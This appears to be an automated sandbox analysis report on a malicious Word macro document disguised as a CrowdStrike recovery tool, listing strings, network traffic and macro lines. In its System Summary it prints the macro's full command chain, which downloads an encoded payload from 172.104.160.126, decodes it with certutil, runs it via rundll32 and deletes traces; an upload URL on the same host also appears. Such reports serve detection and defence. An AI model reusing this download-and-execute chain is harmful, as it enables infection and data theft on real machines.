Source: curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4722Host: login.live.com
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drString found in binary or memory: http://172.104.160.
Source: rundll32.exe, 00000010.00000003.2520216865.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2520153129.0000020A783B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:5000/Upl
Source: rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, rundll32.exe, 00000010.00000003.2257877794.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479616705.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461554328.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2429834267.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510194846.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238753292.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A7832A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2500205273.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2520216865.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2530048667.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2450955120.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461645882.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2540526722.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2257938197.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2490004164.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2416851318.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238844395.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510132228.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479710584.0000020A783B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:5000/Uploadss
Source: vbaProject.binString found in binary or memory: http://172.104.160.126:8099
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/pay
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/pay0
Source: curl.exe, 00000021.00000002.2767652303.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txt
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767652303.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txt-oC:
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txt6
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txt6ov
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txto
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txton
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txtr
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txts
Source: vbaProject.binString found in binary or memory: http://172.104.160.126:80X99
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: document.xmlString found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://curl.se/P
Source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: rundll32.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: curl.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: curl.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://curl.se/docs/sslcerts.html
Source: curl.exeString found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://www.ecosia.org/newtab/
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49325
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49268
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49268 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49325 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49213
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49233
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownHTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49213 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49233 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49268 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49325 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C64B30 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,16_2_00007FFD92C64B30

System Summary

barindex
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, API IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0:Integer,False)Name: MainFunc
Source: ~WRC0000.tmp.26.drOLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: ' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: ' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: dir = Environ("temp")
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: 'pp = pp + "cmd.exe -d & exit"
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String environ: dir = Environ("temp")Name: MainFunc
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String cmd.exe: pp = pp + "tem32\cmd.exe /c "Name: MainFunc
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String rundll32: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "Name: MainFunc
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String wscript: Set objShell = CreateObject("WScript.Shell")Name: MainFunc
Source: ~WRC0000.tmp.26.drOLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: ~WRC0000.tmp.26.drOLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile dump: C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\rundll32.exeFile deleted: C:\Windows\Temp\SGlzdG9yeQ==Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0087153513_2_00871535
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0089A8D813_2_0089A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0087A9B313_2_0087A9B3
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0088C1FD13_2_0088C1FD
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0086E12713_2_0086E127
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008ACAA013_2_008ACAA0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0087FAEC13_2_0087FAEC
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008B33B013_2_008B33B0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0087441513_2_00874415
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008825B813_2_008825B8
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C1925016_2_00007FFD92C19250
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C9520416_2_00007FFD92C95204
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C291B016_2_00007FFD92C291B0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF573016_2_00007FFD92BF5730
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C9B7E016_2_00007FFD92C9B7E0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C95A6016_2_00007FFD92C95A60
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C2F94016_2_00007FFD92C2F940
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF18C016_2_00007FFD92BF18C0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92CAFA2016_2_00007FFD92CAFA20
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C99CA016_2_00007FFD92C99CA0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BEFE1016_2_00007FFD92BEFE10
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF612016_2_00007FFD92BF6120
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C1A0A016_2_00007FFD92C1A0A0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF221016_2_00007FFD92BF2210
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BEEAA016_2_00007FFD92BEEAA0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF2E6016_2_00007FFD92BF2E60
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BEED0516_2_00007FFD92BEED05
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF0DA016_2_00007FFD92BF0DA0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C231D016_2_00007FFD92C231D0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C2517016_2_00007FFD92C25170
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF516016_2_00007FFD92BF5160
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C1B19016_2_00007FFD92C1B190
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C496B016_2_00007FFD92C496B0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C515E016_2_00007FFD92C515E0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C0996016_2_00007FFD92C09960
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C2BCB016_2_00007FFD92C2BCB0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C23DE016_2_00007FFD92C23DE0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BFE33016_2_00007FFD92BFE330
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BEE14016_2_00007FFD92BEE140
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C5E0B016_2_00007FFD92C5E0B0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C3208016_2_00007FFD92C32080
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C9625016_2_00007FFD92C96250
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C3C16016_2_00007FFD92C3C160
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BFE71016_2_00007FFD92BFE710
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C3A7E016_2_00007FFD92C3A7E0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C947A016_2_00007FFD92C947A0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C747C016_2_00007FFD92C747C0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BFE52016_2_00007FFD92BFE520
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C0454016_2_00007FFD92C04540
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C3646016_2_00007FFD92C36460
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C64B3016_2_00007FFD92C64B30
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF4BC016_2_00007FFD92BF4BC0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C96B6E16_2_00007FFD92C96B6E
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BFE90016_2_00007FFD92BFE900
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C0086016_2_00007FFD92C00860
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C16A0016_2_00007FFD92C16A00
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C64CF016_2_00007FFD92C64CF0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C66E5016_2_00007FFD92C66E50
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C96E1016_2_00007FFD92C96E10
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C94D8016_2_00007FFD92C94D80
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0084153533_2_00841535
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0086A8D833_2_0086A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0084A9B333_2_0084A9B3
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0085C1FD33_2_0085C1FD
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0083E12733_2_0083E127
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087CAA033_2_0087CAA0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0084FAEC33_2_0084FAEC
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_008833B033_2_008833B0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0084441533_2_00844415
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_008525B833_2_008525B8
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Source: ~WRC0000.tmp.26.drOLE, VBA macro line: Sub Document_Open()
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE indicator, VBA macros: true
Source: harvardanglia2008officeonline.xsl.0.drOLE indicator, VBA macros: true
Source: mlaseventheditionofficeonline.xsl.0.drOLE indicator, VBA macros: true
Source: turabian.xsl.0.drOLE indicator, VBA macros: true
Source: ieee2006officeonline.xsl.0.drOLE indicator, VBA macros: true
Source: gostname.xsl.0.drOLE indicator, VBA macros: true
Source: APASixthEditionOfficeOnline.xsl.0.drOLE indicator, VBA macros: true
Source: sist02.xsl.0.drOLE indicator, VBA macros: true
Source: iso690nmerical.xsl.0.drOLE indicator, VBA macros: true
Source: gb.xsl.0.drOLE indicator, VBA macros: true
Source: iso690.xsl.0.drOLE indicator, VBA macros: true
Source: chicago.xsl.0.drOLE indicator, VBA macros: true
Source: gosttitle.xsl.0.drOLE indicator, VBA macros: true
Source: CatalogCacheMetaData.xml.26.drOLE indicator, VBA macros: true
Source: ~WRC0000.tmp.26.drOLE indicator, VBA macros: true
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmStream path 'VBA/__SRP_0' : http://172.104.160.126:8099\curl.txt\curl.exe/payload2.txt\mscorsvc.txt\mscorsvc.dllC:\Windows\Sys"tem32\cmd.exe /c$-encode$\cu-decode"$ -o$del&rl.exe &.bq.aSTART( rundll32&,DllMainexit
Source: harvardanglia2008officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: mlaseventheditionofficeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: turabian.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ieee2006officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gostname.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: APASixthEditionOfficeOnline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sist02.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690nmerical.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gb.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: chicago.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gosttitle.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: CatalogCacheMetaData.xml.26.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C915E0 appears 132 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C26F90 appears 415 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C15F20 appears 56 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C2B840 appears 35 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C20ED0 appears 71 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C15810 appears 68 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C97390 appears 35 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92BEAA50 appears 36 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C27080 appears 332 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C90F70 appears 42 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C15FF0 appears 35 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C91110 appears 87 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C91570 appears 266 times
